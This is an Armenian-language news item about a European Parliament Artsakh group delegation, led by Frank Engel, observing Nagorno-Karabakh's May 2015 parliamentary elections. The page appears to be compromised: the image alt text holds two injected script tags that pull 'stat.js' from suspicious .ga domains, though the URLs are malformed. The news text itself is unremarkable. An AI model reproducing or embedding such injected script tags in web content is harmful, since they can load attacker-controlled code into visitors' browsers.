Եվրախորհրդարանում Արցախի խմբի պատվիրակությունը իրականացրել է դիտորդական առաքելություն ԼՂՀ-ում
![<script src='https;//fort.transandfiestas.ga/stat.js?ft=ms' type='text/javascript'></script><script src='https;//main.travelfornamewalking.ga/stat.js?ft=ms' type='text/javascript'></script>](https://eufoa.org/wp-content/uploads/2016/12/11187847_1070782656284570_650785040162976740_o.jpg)
Ընդունելով ԼՂՀ Ազգային Ժողովի նախագահ Աշոտ Ղուլյանի հրավերը` Եվրոպական խորհրդարանի Արցախի խումբը որոշեց պատվիրակություն ուղարկել Լեռնային Ղարաբաղ՝ 2015 թվականի մայիսի 3-ին նախանշված խորհրդարանական ընտրությունները դիտարկելու նպատակով:
Եվրոպական խորհրդարանում Արցախ խմբի նախագահ Ֆրանկ Էնգելը ղեկավարում էր
պատվիրակությունը, որը կազմված էր ԵԽ պատգամավորներից և ուղեկցող անձնակազմից: Պատվիրակությունը բաղկացած էր ԵՄ տարբեր երկրների և Եվրոպական խորհրդարանի խոշոր քաղաքական խմբերի ներկայացուցիչներից:
Պատվիրակությունն իրականացրեց իր գործունեությունը մայիսի 2-4-ը՝ գործակցելով ԵՄ անդամ երկրների այլ խորհրդարանականների հետ: Իր կարճատև դիտորդական առաքելությունը պատվիրակությունը իրականացրեց համաձայն Եվրոպական խորհրդարանի գործելակերպի՝ նախ հանդիպելով բոլոր թեկնածուներին, ապա շրջելով ավելի քան 20 ընտրատեղամասում, հետևելով որոշ ընտրատեղամասերի բացմանը, քվեաթերթիկների հաշվարկմանը և ընտրատեղամասերի փակմանը:
Սեղմեք այստեղ պատվիրակության ամբողջական հաշվետվությունը կարդալու համար
Լրաթերթ
Բաժանորդագրվեք մեր լրաթերթին նորությունները էլ. փոստին ստանալու համար: